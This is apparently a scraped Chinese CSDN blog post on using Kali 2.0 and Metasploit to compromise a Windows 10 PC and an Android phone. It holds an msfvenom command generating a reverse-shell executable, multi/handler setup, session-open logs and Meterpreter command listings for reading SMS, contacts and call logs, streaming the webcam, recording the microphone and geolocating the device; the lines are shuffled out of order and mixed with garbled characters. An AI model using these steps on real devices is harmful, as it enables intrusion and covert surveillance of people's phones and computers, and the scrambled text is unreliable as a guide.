kali攻击手机_kali2.0下入侵windows 10和android手机实战

这篇博客展示了如何使用Kali 2.0对Windows 10和Android设备进行攻击。内容包括启动payload处理程序、获取远程系统信息、设置端口转发、列出运行进程、文件上传等,还提到了Meterpreter会话管理和Android设备的特定命令,如检查设备是否已root、获取联系人列表和短信等。
摘要由CSDN通过智能技术生成

sysinfo Gets information about the remote system, such as OS

[*] Starting the payload handler…

Command Description

[*] Command shell session 1 opened (192.168.168.111:3333 -> 192.168.168.109:3094) at 2019-06-16 20:59:00 -0400

enable_unicode_encoding Enables encoding of unicode strings

set_timeouts Set the current session timeout values

upload Upload a file or directory

exit Terminate the meterpreter session

? Help menu

background Backgrounds the current session

exploit

[*] Device is not rooted

=============

get_timeouts Get the current session timeout values

ps List running processes

info Displays information about a Post module

Command Description

[*] Exploit completed, but no session was created.

show options

meterpreter > check_root

[*] Starting the payload handler…

^C[-] Exploit failed: Interrupt

[*] Preparing player…

Payload options (windows/x64/shell/reverse_tcp):

[*] Opening player at: kxQmnwHE.html

webcam_chat Start a video chat

edit Edit a file

load Load one or more meterpreter extensions

bgkill Kills a background meterpreter script

machine_id Get the MSF ID of the machine attached to the session

(c) 2019 Microsoft Corporation����������Ȩ����

getlwd Print local working directory

Module options (exploit/multi/handler):

Stdapi: System Commands

route View and modify the routing table

[*] Starting the payload handler…

record_mic Record audio from the default microphone for X seconds

——- ———–

Stdapi: Webcam Commands

use exploit/multi/handler

Name Current Setting Required Description

geolocate Get current lat-long using geolocation

Command Description

Core Commands

C:\Users\�ѿ�\Desktop\projects>

[*] Starting…

set LHOST 172.19.40.110

Microsoft Windows [�汾 10.0.10586]

msf exploit(handler) > set LPORT 8888

webcam_snap Take a snapshot from the specified webcam

LPORT => 8888

read Reads data from a channel

webcam_list List webcams

interval_collect Manage interval collection capabilities

rm Delete the specified file

mkdir Make directory

Name Current Setting Required Description

pwd Print working directory

—- ————— ——– ———–

ls List files

dump_calllog Get call log

dump_sms Get sms messages

kali2.0入侵android手机实战

resource Run the commands stored in a file

execute Execute a command

ipconfig Display interfaces

channel Displays information or control active channels

download Download a file or directory

Command Description

exploit

=======================

——- ———–

getuid Get the user that the server is running as

LPORT 4444 yes The listen port

portfwd Forward a local port to a remote service

Android Commands

[*] Sending stage (60790 bytes) to 172.19.0.172

bglist Lists running background scripts

rmdir Remove directory

help Help menu

root@kali:~# msfconsole

Stdapi: Networking Commands

ifconfig Display interfaces

set PAYLOAD android/meterpreter/reverse_tcp

Command Description

LHOST yes The listen address

msfvenom –platform windows -p windows/x64/shell/reverse_tcp LHOST=192.168.168.111 LPORT=3333 EXITFUNC=thread -b ‘\x00’ -f exe-only -o /root/Desktop/shell1.exe

[*] Streaming…

shell Drop into a system command shell

——- ———–

run Executes a meterpreter script or Post module

set payload windows/x64/shell/reverse_tcp

getwd Print working directory

[*] Meterpreter session 1 opened (172.19.40.110:8888 -> 172.19.0.172:57070) at 2019-06-16 23:11:36 -0400

===========================

dir List files (alias for ls)

search Search for files

disable_unicode_encoding Disables encoding of unicode strings

lcd Change local working directory

[*] Started reverse TCP handler on 172.19.40.110:4444

set LPORT 3333

=======================

write Writes data to a channel

root@kali:~# service postgresql start

[*] Sending stage (336 bytes) to 192.168.168.109

——- ———–

check_root Check if device is rooted

——- ———–

irb Drop into irb scripting mode

Command Description

webcam_stream Play a video stream from the specified webcam

use exploit/multi/handler

msf exploit(handler) > exploit

send_sms Sends SMS from target session

wlan_geolocate Get current lat-long using WLAN information

meterpreter > sessions -I

EXITFUNC process yes Exit technique (Accepted: ”, seh, thread, process, none)

dump_contacts Get contacts list

uuid Get the UUID for the current session

meterpreter > webcam_stream

meterpreter > help

sleep Force Meterpreter to go quiet, then re-establish session.

============================

cat Read the contents of a file to the screen

lpwd Print local working directory

================

use Deprecated alias for ‘load’

bgrun Executes a meterpreter script as a background thread

cd Change directory

——- ———–

[*] Started reverse TCP handler on 192.168.168.111:3333

show options

quit Terminate the meterpreter session

—- ————— ——– ———–

close Closes a channel

[*] Started reverse TCP handler on 172.19.40.110:8888

set LHOST 192.168.168.111

transport Change the current transport mechanism

Stdapi: File system Commands

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值